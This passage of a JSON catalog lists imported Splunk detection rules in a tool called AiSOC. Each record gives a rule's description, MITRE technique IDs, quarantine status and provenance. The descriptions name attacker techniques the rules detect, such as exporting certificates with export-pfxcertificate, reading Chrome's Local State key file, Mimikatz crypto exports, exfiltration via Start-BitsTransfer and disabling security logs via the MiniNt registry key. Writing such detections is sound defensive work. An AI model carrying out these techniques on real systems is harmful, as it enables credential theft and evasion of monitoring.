"source_id": "387c4e78-f4a4-413d-ad44-e9f7bc4642c9", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/linux_busybox_privilege_escalation.yml" } }, { "id": "splunk-security-content-38cbd42c-1098-41bb-99cf-9d6d2b296d83", "type": "detection", "name": "WMI Temporary Event Subscription", "description": "The following analytic detects the creation of WMI temporary event subscriptions. It leverages Windows Event Logs, specifically EventCode 5860, to identify these activities. This detection is significant because attackers often use WMI to execute commands, gather information, or maintain persistence within a compromised system. If confirmed malicious, this activity could allow an attacker to execute arbitrary code, escalate privileges, or persist in the environment. Analysts should review the specific WMI queries and assess their intent, considering potential false positives from legitimate administrative tasks.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1047" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/wmi-temporary-event-subscription.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "38cbd42c-1098-41bb-99cf-9d6d2b296d83", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/wmi_temporary_event_subscription.yml" } }, { "id": "splunk-security-content-38f034ed-1598-46c8-95e8-14edf05fdf5d", "type": "detection", "name": "Microsoft Defender ATP Alerts", "description": "The following analytic is to leverage alerts from Microsoft Defender ATP Alerts. This query aggregates and summarizes all alerts from Microsoft Defender ATP Alerts, providing details such as the source, file name, severity, process command line, ip address, registry key, signature, description, unique id, and timestamps. This detection is not intended to detect new activity from raw data, but leverages Microsoft provided alerts to be correlated with other data as part of risk based alerting. The data contained in the alert is mapped not only to the risk object, but also the threat object. This detection filters out evidence that has a verdict of clean from Microsoft. It dynamically maps the MITRE technique at search time to auto populate the annotation field with the value provided in the alert. It also uses a dynamic mapping to set the risk score in Enterprise Security based on the severity of the alert.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/microsoft-defender-atp-alerts.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "38f034ed-1598-46c8-95e8-14edf05fdf5d", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/microsoft_defender_atp_alerts.yml" } }, { "id": "splunk-security-content-38fe731c-1f13-43d4-b878-a5bbe44807e3", "type": "detection", "name": "Windows IIS Components Add New Module", "description": "The following analytic detects the execution of AppCmd.exe to install a new module in IIS. This detection leverages data from Endpoint Detection and Response (EDR) agents, focusing on process names and command-line executions. This activity is significant as adversaries may use it to install webshells or backdoors, leading to credit card scraping, persistence, and further post-exploitation. If confirmed malicious, this could allow attackers to maintain persistent access, execute arbitrary code, and potentially exfiltrate sensitive information from the compromised web server.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1505.004" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-iis-components-add-new-module.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "38fe731c-1f13-43d4-b878-a5bbe44807e3", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_iis_components_add_new_module.yml" } }, { "id": "splunk-security-content-391329f3-c14b-4b8d-8b37-ac5012637360", "type": "detection", "name": "Windows Steal Authentication Certificates Export PfxCertificate", "description": "The following analytic detects the use of the PowerShell cmdlet `export-pfxcertificate` on the command line, indicating an attempt to export a certificate from the local Windows Certificate Store. This detection leverages data from Endpoint Detection and Response (EDR) agents, focusing on process execution logs and command-line arguments. This activity is significant as it may indicate an attempt to exfiltrate authentication certificates, which can be used to impersonate users or decrypt sensitive data. If confirmed malicious, this could lead to unauthorized access and potential data breaches.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1649" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-steal-authentication-certificates-export-pfxcertificate.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "391329f3-c14b-4b8d-8b37-ac5012637360", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_steal_authentication_certificates_export_pfxcertificate.yml" } }, { "id": "splunk-security-content-39405650-c364-4e1e-a740-32a63ef042a6", "type": "detection", "name": "Windows PowerView AD Access Control List Enumeration", "description": "The following analytic detects the execution of PowerView PowerShell cmdlets `Get-ObjectAcl` or `Get-DomainObjectAcl`, which are used to enumerate Access Control List (ACL) permissions for Active Directory objects. It leverages Event ID 4104 from PowerShell Script Block Logging to identify this activity. This behavior is significant as it may indicate an attempt to discover weak permissions in Active Directory, potentially leading to privilege escalation. If confirmed malicious, attackers could exploit these permissions to gain unauthorized access or escalate their privileges within the network.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1078.002", "T1069" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-powerview-ad-access-control-list-enumeration.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "39405650-c364-4e1e-a740-32a63ef042a6", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_powerview_ad_access_control_list_enumeration.yml" } }, { "id": "splunk-security-content-395163b8-689b-444b-86c7-9fe9ad624734", "type": "detection", "name": "PaperCut NG Suspicious Behavior Debug Log", "description": "The following analytic identifies potential exploitation attempts on a PaperCut NG server by analyzing its debug log data. It detects unauthorized or suspicious access attempts from public IP addresses and searches for specific URIs associated with known exploits. The detection leverages regex to parse unstructured log data, focusing on admin login activities. This activity is significant as it can indicate an active exploitation attempt on the server. If confirmed malicious, attackers could gain unauthorized access, potentially leading to data breaches or further compromise of the server.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1190", "T1133" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/papercut-ng-suspicious-behavior-debug-log.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "395163b8-689b-444b-86c7-9fe9ad624734", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/papercut_ng_suspicious_behavior_debug_log.yml" } }, { "id": "splunk-security-content-395e50e1-2b87-4fa3-8632-0dfbdcbcd2cb", "type": "detection", "name": "AWS Successful Console Authentication From Multiple IPs", "description": "The following analytic detects an AWS account successfully authenticating from multiple unique IP addresses within a 5-minute window. It leverages AWS CloudTrail logs, specifically monitoring `ConsoleLogin` events and counting distinct source IPs. This behavior is significant as it may indicate compromised credentials, potentially from a phishing attack, being used concurrently by an adversary and a legitimate user. If confirmed malicious, this activity could allow unauthorized access to corporate resources, leading to data breaches or further exploitation within the AWS environment.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1586", "T1535" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/aws-successful-console-authentication-from-multiple-ips.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "395e50e1-2b87-4fa3-8632-0dfbdcbcd2cb", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/cloud/aws_successful_console_authentication_from_multiple_ips.yml" } }, { "id": "splunk-security-content-395ed5fe-ad13-4366-9405-a228427bdd91", "type": "detection", "name": "Windows Impair Defense Delete Win Defender Context Menu", "description": "The following analytic detects the deletion of the Windows Defender context menu entry from the registry. It leverages data from the Endpoint datamodel, specifically monitoring registry actions where the path includes \"*\\\\shellex\\\\ContextMenuHandlers\\\\EPP\" and the action is 'deleted'. This activity is significant as it is commonly associated with Remote Access Trojan (RAT) malware attempting to disable security features. If confirmed malicious, this could allow an attacker to impair defenses, facilitating further malicious activities such as unauthorized access, persistence, and data exfiltration.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1562.001" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-impair-defense-delete-win-defender-context-menu.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "395ed5fe-ad13-4366-9405-a228427bdd91", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_impair_defense_delete_win_defender_context_menu.yml" } }, { "id": "splunk-security-content-396de86f-25e7-4b0e-be09-a330be35249d", "type": "detection", "name": "Windows MSExchange Management Mailbox Cmdlet Usage", "description": "The following analytic identifies suspicious Cmdlet usage in Exchange Management logs, focusing on commands like New-MailboxExportRequest and New-ManagementRoleAssignment. It leverages EventCode 1 and specific Message patterns to detect potential ProxyShell and ProxyNotShell abuse. This activity is significant as it may indicate unauthorized access or manipulation of mailboxes and roles, which are critical for maintaining email security. If confirmed malicious, attackers could export mailbox data, assign new roles, or search mailboxes, leading to data breaches and privilege escalation.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1059.001" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-msexchange-management-mailbox-cmdlet-usage.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "396de86f-25e7-4b0e-be09-a330be35249d", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_msexchange_management_mailbox_cmdlet_usage.yml" } }, { "id": "splunk-security-content-39c61d09-8b30-4154-922b-2d0a694ecc22", "type": "detection", "name": "Detect New Open S3 Buckets over AWS CLI", "description": "The following analytic detects the creation of open/public S3 buckets via the AWS CLI. It leverages AWS CloudTrail logs to identify events where a user has set bucket permissions to allow access to \"AuthenticatedUsers\" or \"AllUsers.\" This activity is significant because open S3 buckets can expose sensitive data to unauthorized users, leading to data breaches. If confirmed malicious, an attacker could gain unauthorized access to potentially sensitive information stored in the S3 bucket, posing a significant security risk.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1530" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/detect-new-open-s3-buckets-over-aws-cli.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "39c61d09-8b30-4154-922b-2d0a694ecc22", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/cloud/detect_new_open_s3_buckets_over_aws_cli.yml" } }, { "id": "splunk-security-content-39e2605a-90d8-11eb-899e-acde48001122", "type": "detection", "name": "PowerShell Start-BitsTransfer", "description": "The following analytic detects the execution of the PowerShell command `Start-BitsTransfer`, which can be used for file transfers, including potential data exfiltration. It leverages data from Endpoint Detection and Response (EDR) agents, focusing on process creation events and command-line arguments. This activity is significant because `Start-BitsTransfer` can be abused by adversaries to upload sensitive files to remote locations, posing a risk of data loss. If confirmed malicious, this could lead to unauthorized data exfiltration, compromising sensitive information and potentially leading to further exploitation of the network.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1197" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/powershell-start-bitstransfer.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "39e2605a-90d8-11eb-899e-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/powershell_start_bitstransfer.yml" } }, { "id": "splunk-security-content-39ebdc68-25b9-11ec-aec7-acde48001122", "type": "detection", "name": "Disable Security Logs Using MiniNt Registry", "description": "The following analytic detects a suspicious registry modification aimed at disabling security audit logs by adding a specific registry entry. It leverages data from the Endpoint.Registry data model, focusing on changes to the \"Control\\\\MiniNt\" registry path. This activity is significant because it can prevent Windows from logging any events to the Security Log, effectively blinding security monitoring efforts. If confirmed malicious, this technique could allow an attacker to operate undetected, making it difficult to trace their actions and compromising the integrity of security audits.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1112" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/disable-security-logs-using-minint-registry.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "39ebdc68-25b9-11ec-aec7-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/disable_security_logs_using_minint_registry.yml" } }, { "id": "splunk-security-content-3a1d8f62-5b9c-4e7d-b8f3-9d6a8e2f5e1f", "type": "detection", "name": "Detect Web Access to Decommissioned S3 Bucket", "description": "This detection identifies web requests to domains that match previously decommissioned S3 buckets through web proxy logs. This activity is significant because attackers may attempt to access or recreate deleted S3 buckets that were previously public to hijack them for malicious purposes. If successful, this could allow attackers to host malicious content or exfiltrate data through compromised bucket names that may still be referenced by legitimate applications.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.application" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1485" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/detect-web-access-to-decommissioned-s3-bucket.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "3a1d8f62-5b9c-4e7d-b8f3-9d6a8e2f5e1f", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/web/detect_web_access_to_decommissioned_s3_bucket.yml" } }, { "id": "splunk-security-content-3a76d52f-a007-4a65-a37d-f313c2c83f31", "type": "detection", "name": "Windows Suspicious Named Pipe", "description": "The following analytic detects the creation or connection to known suspicious named pipes.\nIt leverages Sysmon EventCodes 17 and 18 to identify known default pipe names used by malicious or suspicious tools.\nIf confirmed malicious, this could allow an attacker to abuse these to potentially gain privilege escalation,\npersistence, c2 communications, or further system compromise.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1559", "T1021.002", "T1055" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-suspicious-named-pipe.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "3a76d52f-a007-4a65-a37d-f313c2c83f31", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_suspicious_named_pipe.yml" } }, { "id": "splunk-security-content-3a91a212-98a9-11eb-b86a-acde48001122", "type": "detection", "name": "Windows Multiple Users Failed To Authenticate Using Kerberos", "description": "The following analytic identifies a single source endpoint failing to authenticate with 30 unique users using the Kerberos protocol. It leverages EventCode 4771 with Status 0x18, indicating wrong password attempts, and aggregates these events over a 5-minute window. This behavior is significant as it may indicate a Password Spraying attack, where an adversary attempts to gain initial access or elevate privileges in an Active Directory environment. If confirmed malicious, this activity could lead to unauthorized access, privilege escalation, and potential compromise of sensitive information.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1110.003" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-multiple-users-failed-to-authenticate-using-kerberos.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "3a91a212-98a9-11eb-b86a-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_multiple_users_failed_to_authenticate_using_kerberos.yml" } }, { "id": "splunk-security-content-3a9a6806-16a8-4cda-8d73-b49d10a05b16", "type": "detection", "name": "Windows Mimikatz Crypto Export File Extensions", "description": "The following analytic detects the creation of files with extensions commonly associated with the Mimikatz Crypto module. It leverages the Endpoint.Filesystem data model to identify specific file names indicative of certificate export activities. This behavior is significant as it may indicate the use of Mimikatz to export cryptographic keys, which is a common tactic for credential theft. If confirmed malicious, this activity could allow an attacker to exfiltrate sensitive cryptographic material, potentially leading to unauthorized access and further compromise of the environment.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1649" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-mimikatz-crypto-export-file-extensions.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "3a9a6806-16a8-4cda-8d73-b49d10a05b16", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_mimikatz_crypto_export_file_extensions.yml" } }, { "id": "splunk-security-content-3b132a71-9335-4f33-9932-00bb4f6ac7e8", "type": "detection", "name": "Linux Deletion Of Cron Jobs", "description": "The following analytic detects the deletion of cron jobs on a Linux machine. It leverages filesystem event logs to identify when files within the \"/etc/cron.*\" directory are deleted. This activity is significant because attackers or malware may delete cron jobs to disable scheduled security tasks or evade detection mechanisms. If confirmed malicious, this action could allow an attacker to disrupt system operations, evade security measures, or facilitate further malicious activities such as data wiping, as seen with the acidrain malware.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1070.004", "T1485" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/linux-deletion-of-cron-jobs.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "3b132a71-9335-4f33-9932-00bb4f6ac7e8", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/linux_deletion_of_cron_jobs.yml" } }, { "id": "splunk-security-content-3b1d09a8-a26f-473e-a510-6c6613573657", "type": "detection", "name": "Windows Credentials from Password Stores Chrome LocalState Access", "description": "The following analytic detects non-Chrome processes accessing the Chrome \"Local State\" file, which contains critical settings and information. It leverages Windows Security Event logs, specifically event code 4663, to identify this behavior. This activity is significant because threat actors can exploit this file to extract the encrypted master key used for decrypting saved passwords in Chrome. If confirmed malicious, this could lead to unauthorized access to sensitive information, posing a severe security risk. Monitoring this anomaly helps identify potential threats and safeguard browser-stored data.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1012" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-credentials-from-password-stores-chrome-localstate-access.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "3b1d09a8-a26f-473e-a510-6c6613573657", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_credentials_from_password_stores_chrome_localstate_access.yml" } }, { "id": "splunk-security-content-3b4e18cb-497f-4073-85ad-1ada7c2107ab", "type": "detection", "name": "Windows Registry SIP Provider Modification", "description": "The following analytic detects modifications to the Windows Registry SIP Provider. It leverages Sysmon EventID 7 to monitor registry changes in paths and values related to Cryptography Providers and OID Encoding Types. This activity is significant as it may indicate an attempt to subvert trust controls, a common tactic for bypassing security measures and maintaining persistence. If confirmed malicious, an attacker could manipulate the system's cryptographic functions, potentially leading to unauthorized access, data theft, or other damaging outcomes. Review the modified registry paths and concurrent processes to identify the attack source.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1553.003" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-registry-sip-provider-modification.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "3b4e18cb-497f-4073-85ad-1ada7c2107ab", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_registry_sip_provider_modification.yml" } }, { "id": "splunk-security-content-3b6e1d36-6916-4eec-a7d5-bc98953ba595", "type": "detection", "name": "O365 Email Suspicious Search Behavior", "description": "The following analytic identifies when Office 365 users search for suspicious keywords or have an excessive number of queries to a mailbox within a limited timeframe. This behavior may indicate that a malicious actor has gained control of a mailbox and is conducting discovery or enumeration activities.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1114.002", "T1552" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/o365-email-suspicious-search-behavior.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "3b6e1d36-6916-4eec-a7d5-bc98953ba595", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/cloud/o365_email_suspicious_search_behavior.yml" } }, { "id": "splunk-security-content-3b711292-9793-4a88-8e89-6e016cfbc09c", "type": "detection", "name": "Windows WinRAR Launched Outside Default Installation Directory", "description": "This Analytics detects the execution of WinRAR or RAR outside the default installation directory.\nThis behavior can be significant as it could indicate attempts to archive collected sensitive data from the endpoint for exfiltration.\nWe recommend reviewing the process path and the parent process path to determine if the execution is legitimate and if possible validate the data being archived.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1047" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-winrar-launched-outside-default-installation-directory.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "3b711292-9793-4a88-8e89-6e016cfbc09c", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_winrar_launched_outside_default_installation_directory.yml" } }, { "id": "splunk-security-content-3b8d2b4f-4e1e-4a9e-9b43-8a7a3a9c7e21", "type": "detection", "name": "Cisco Smart Install Oversized Packet Detection", "description": "This analytic detects oversized Cisco Smart Install (SMI) protocol messages by inspecting traffic to TCP port 4786\nwithin the Network_Traffic data model. Abnormally large SMI payloads have been associated with exploitation and\nprotocol abuse (e.g., CVE-2018-0171; activity reported by the \"Static Tundra\" threat actor). Monitoring message\nsizes over time can help identify possible attempts at remote code execution, denial of service, or reconnaissance\nagainst Cisco devices exposing Smart Install.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.network" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1190" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/cisco-smart-install-oversized-packet-detection.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "3b8d2b4f-4e1e-4a9e-9b43-8a7a3a9c7e21", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/network/cisco_smart_install_oversized_packet_detection.yml" } }, { "id": "splunk-security-content-3bf5541a-6a45-4fdc-b01d-59b899fff961", "type": "detection", "name": "Detect Remote Access Software Usage File", "description": "The following analytic detects the writing of files from known remote access software to disk within the environment.\nIt leverages data from Endpoint Detection and Response (EDR) agents, focusing on file path, file name, and user information.\nThis activity is significant as adversaries often use remote access tools like AnyDesk, GoToMyPC, LogMeIn, and TeamViewer to maintain unauthorized access.\nIf confirmed malicious, this could allow attackers to persist in the environment, potentially leading to data exfiltration, further compromise, or complete control over affected systems.\nIt is best to update both the remote_access_software_usage_exception.csv lookup and the remote_access_software lookup with any known or approved remote access software to reduce false positives and increase coverage.\nIn order to enhance performance, the detection filters for specific file names extensions / names that are used in the remote_access_software lookup.\nIf add additional entries, consider updating the search filters to include those file names / extensions as well, if not alread covered.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1219" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/detect-remote-access-software-usage-file.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "3bf5541a-6a45-4fdc-b01d-59b899fff961", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/detect_remote_access_software_usage_file.yml" } }, { "id": "splunk-security-content-3c49e5ed-625c-408c-a2c7-8e2b524efb2c", "type": "detection", "name": "Microsoft Intune DeviceManagementConfigurationPolicies", "description": "Microsoft Intune device management configuration policies are a tool administrators can use to remotely manage policies and settings on intune managed devices. This functionality can also be abused to disable defences & evade detection. This detection identifies when a new device management configuration policy has been created.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1072", "T1484", "T1021.007", "T1562.001", "T1562.004" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/microsoft-intune-devicemanagementconfigurationpolicies.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "3c49e5ed-625c-408c-a2c7-8e2b524efb2c", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": 